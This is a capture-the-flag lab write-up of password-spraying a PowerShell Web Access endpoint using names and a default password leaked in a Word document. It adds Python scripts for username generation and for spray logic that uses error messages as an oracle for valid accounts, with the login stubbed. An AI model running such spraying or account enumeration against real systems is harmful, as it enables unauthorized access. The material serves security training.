Exploitation
The following information was found during the earlier web enumeration:
- The web application disclosed several names that could be potential users
- A Word document, New_Starter_CheckList_v7.docx, revealed:
  - the PSWA (PowerShell Web Access) endpoint: /Acute_Staff_Access
  - the default password for new users: Password1!
  - document metadata containing:
    - a potential username naming convention
    - host: Acute-PC01
    - user: Daniel
With several names, a naming convention, and a default password in hand, it is possible to build a list of potential usernames and try each of them against the PSWA endpoint.
Naming Convention
The naming convention appears to be the first letter of the first name followed by the last name. I will create a list of potential usernames following that format.
┌──(kali㉿kali)-[~/archive/htb/labs/acute]
└─$ cat users
edavies
imonks
jmorgan
awallace
lhopkins
chall
fcastle
daniel
daniel is added as is, taken directly from the document metadata.
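As an added example (not part of the original writeup), the following script derives candidate usernames from disclosed full names using the convention observed above, first initial plus surname, and keeps a bare first name as is. The full names in SAMPLE_NAMES are constructed placeholders: the surnames match the user list above, the first names are made up, and "Daniel" is the bare name from the metadata. It also generalizes to a few other conventions commonly seen in Active Directory environments for cases where the convention is not yet known.

```python
# Added example, not part of the original writeup: build candidate usernames
# from disclosed full names. The convention seen in the document metadata is
# first initial + surname ("Ed Davies" -> "edavies"); a single-token name such
# as "Daniel" is kept as is. SAMPLE_NAMES is constructed: only the surnames
# come from the writeup, the first names are made up.
import re
from typing import Callable, Dict, Iterable, List, Tuple

SAMPLE_NAMES = [
    "Ed Davies",
    "Ian Monks",
    " Jo   Morgan ",   # stray whitespace, as copied from a web page
    "Al Wallace",
    "Lee Hopkins",
    "Chris Hall",
    "Fran Castle",
    "Daniel",          # single token from the docx metadata: no surname
]


def _clean(token: str) -> str:
    """Lower-case a name part and drop punctuation (O'Brien-Smith -> obriensmith)."""
    return re.sub(r"[^a-z0-9]", "", token.lower())


def split_name(full_name: str) -> Tuple[str, str]:
    """Return (first, last); for a single-token name both are the same token."""
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if not parts:
        raise ValueError("empty name: %r" % full_name)
    return parts[0], parts[-1]


def first_initial_lastname(full_name: str) -> str:
    """The convention observed on this page."""
    first, last = split_name(full_name)
    if first == last:          # bare first name: keep it unchanged, like "daniel"
        return first
    return first[0] + last


def _first_dot_last(n: str) -> str:
    first, last = split_name(n)
    return first if first == last else first + "." + last


def _firstlast(n: str) -> str:
    first, last = split_name(n)
    return first if first == last else first + last


def _lastf(n: str) -> str:
    first, last = split_name(n)
    return first if first == last else last + first[0]


# Generalization beyond the page's single rule: other conventions often met in AD.
CONVENTIONS: Dict[str, Callable[[str], str]] = {
    "flast": first_initial_lastname,
    "first.last": _first_dot_last,
    "firstlast": _firstlast,
    "lastf": _lastf,
    "first": lambda n: split_name(n)[0],
}


def build_userlist(names: Iterable[str],
                   conventions: Iterable[str] = ("flast",)) -> List[str]:
    """Expand every name under each requested convention; de-duplicated, order preserved."""
    seen, out = set(), []
    for conv in conventions:
        fn = CONVENTIONS[conv]
        for name in names:
            user = fn(name)
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Writes the same list the writeup shows under `cat users`.
    for user in build_userlist(SAMPLE_NAMES):
        print(user)
```

Passing several conventions, for example `build_userlist(names, ("flast", "first.last", "lastf"))`, expands the list when the convention is uncertain; each extra convention multiplies the number of sign-in attempts, so it is worth confirming the format from metadata, as here, before spraying.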
Authentication
The default password turns out to be valid for the edavies user on the Acute-PC01 host.
An initial foothold is established on the Acute-PC01 host as the edavies user via PSWA.
Judging by its IP address, the Acute-PC01 host might be a Docker container.
Error Messages
While performing a manual brute-force attack, I noticed something interesting.
The error message for an incorrect credential is unambiguous: Sign-in failed. Verify that you have entered your credentials correctly.
However, attempting to authenticate as the chall user with the default password returns a different message: An authorization failure occurred. Verify that you are authorized to connect to the destination computer.
That is not the standard authentication error; it concerns authorization rather than authentication.
Looking up this message in the official Microsoft documentation reveals a list of potential causes.
This may indicate that the credential itself is correct, but that the chall user is not authorized to connect to the destination computer over WinRM. The two distinct messages effectively act as an oracle: a wrong password and a correct password for an unauthorized user can be told apart from the response alone.
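As an added example (not part of the original writeup), the script below turns that observation into spray logic: it classifies a PSWA sign-in response into the two outcomes quoted above, and drives one password against the whole user list through a pluggable login function. The `fake_login` function is a constructed stand-in that returns canned response bodies mirroring the result described here (edavies signs in, chall is valid but unauthorized); against a real target it would be replaced by an HTTP POST to the PSWA sign-in form, whose field names are not reproduced on this page.

```python
# Added example, not part of the original writeup: classify PSWA sign-in
# responses and use the difference between the two messages as an oracle while
# spraying one password across many users. `fake_login` and FAKE_DIRECTORY are
# constructed stand-ins; no network traffic is generated.
from enum import Enum
from typing import Callable, Dict, Iterable, List

# Exact messages quoted in the writeup.
SIGNIN_FAILED = ("Sign-in failed. Verify that you have entered your "
                 "credentials correctly.")
AUTHZ_FAILED = ("An authorization failure occurred. Verify that you are "
                "authorized to connect to the destination computer.")


class Outcome(Enum):
    INVALID_CREDENTIALS = "invalid credentials"      # authentication failed
    VALID_NOT_AUTHORIZED = "valid, not authorized"   # authenticated, WinRM authorization failed
    NO_ERROR = "no error message"                    # neither message: check for a live session


def classify(body: str) -> Outcome:
    """Map a sign-in response body to an outcome. The two server messages are
    distinguishable, so a wrong password and a right-but-unauthorized one differ."""
    if SIGNIN_FAILED in body:
        return Outcome.INVALID_CREDENTIALS
    if AUTHZ_FAILED in body:
        return Outcome.VALID_NOT_AUTHORIZED
    return Outcome.NO_ERROR


# Constructed stand-in for the real sign-in form: which user gets which response
# is made up to mirror the writeup's result.
FAKE_DIRECTORY = {
    ("edavies", "Password1!"): "<html><body>Windows PowerShell Web Access console</body></html>",
    ("chall", "Password1!"): "<html><body><span id='err'>" + AUTHZ_FAILED + "</span></body></html>",
}


def fake_login(user: str, password: str, computer: str) -> str:
    """Return a canned response body; anything not in FAKE_DIRECTORY fails authentication."""
    return FAKE_DIRECTORY.get((user, password),
                              "<html><body>" + SIGNIN_FAILED + "</body></html>")


def spray(users: Iterable[str], password: str, computer: str,
          login: Callable[[str, str, str], str]) -> Dict[str, Outcome]:
    """One password against many users: a single attempt per account keeps
    lockout exposure low compared with many passwords against one account."""
    results: Dict[str, Outcome] = {}
    for user in users:
        results[user] = classify(login(user, password, computer))
    return results


def candidates(results: Dict[str, Outcome]) -> List[str]:
    """Users worth following up: everyone who got past authentication,
    whether or not WinRM authorization on the destination succeeded."""
    return [u for u, o in results.items() if o is not Outcome.INVALID_CREDENTIALS]


if __name__ == "__main__":
    users = ["edavies", "imonks", "jmorgan", "awallace",
             "lhopkins", "chall", "fcastle", "daniel"]
    res = spray(users, "Password1!", "Acute-PC01", fake_login)
    for u, o in res.items():
        print(f"{u:10} {o.value}")
    print("follow up:", candidates(res))
```

The point of keeping `VALID_NOT_AUTHORIZED` separate from a plain failure is that such accounts have a confirmed password even though they cannot use PSWA, so they are candidates for other services and for later access once a more privileged path is found.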